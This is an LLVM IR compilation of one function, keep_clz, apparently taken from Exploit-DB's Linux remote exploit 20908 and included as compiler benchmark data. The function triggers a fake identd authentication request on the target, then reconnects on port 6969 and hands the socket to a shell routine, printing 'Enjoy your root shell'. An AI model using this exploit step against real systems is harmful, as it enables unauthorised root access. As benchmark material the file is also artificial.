; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/remote/extr_20908.c_keep_clz.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/remote/extr_20908.c_keep_clz.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@host = common dso_local global i64* null, align 8
@.str = private unnamed_addr constant [45 x i8] c"+Causing an auth request to our fake_identd\0A\00", align 1
@MY_PORT = common dso_local global i32 0, align 4
@THEIR_PORT = common dso_local global i32 0, align 4
@.str.1 = private unnamed_addr constant [8 x i8] c"  done\0A\00", align 1
@.str.2 = private unnamed_addr constant [37 x i8] c"+Enjoy your root shell...\0A  0x69 =)\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @keep_clz() #0 {
  %1 = alloca i32, align 4
  %2 = load i64*, i64** @host, align 8
  %3 = getelementptr inbounds i64, i64* %2, i64 0
  %4 = load i64, i64* %3, align 8
  %5 = icmp ne i64 %4, 0
  br i1 %5, label %6, label %21

6:                                                ; preds = %0
  %7 = call i32 @printf(i8* getelementptr inbounds ([45 x i8], [45 x i8]* @.str, i64 0, i64 0))
  %8 = load i64*, i64** @host, align 8
  %9 = load i32, i32* @MY_PORT, align 4
  %10 = load i32, i32* @THEIR_PORT, align 4
  %11 = call i32 @sockami2(i64* %8, i32 %9, i32 %10)
  store i32 %11, i32* %1, align 4
  %12 = call i32 @printf(i8* getelementptr inbounds ([8 x i8], [8 x i8]* @.str.1, i64 0, i64 0))
  %13 = load i32, i32* %1, align 4
  %14 = call i32 @close(i32 %13)
  %15 = call i32 @printf(i8* getelementptr inbounds ([37 x i8], [37 x i8]* @.str.2, i64 0, i64 0))
  %16 = call i32 @sleep(i32 1)
  %17 = load i64*, i64** @host, align 8
  %18 = call i32 @sockami2(i64* %17, i32 6969, i32 30464)
  store i32 %18, i32* %1, align 4
  %19 = load i32, i32* %1, align 4
  %20 = call i32 @shellami(i32 %19)
  br label %21

21:                                               ; preds = %6, %0
  ret void
}

declare dso_local i32 @printf(i8*) #1

declare dso_local i32 @sockami2(i64*, i32, i32) #1

declare dso_local i32 @close(i32) #1

declare dso_local i32 @sleep(i32) #1

declare dso_local i32 @shellami(i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
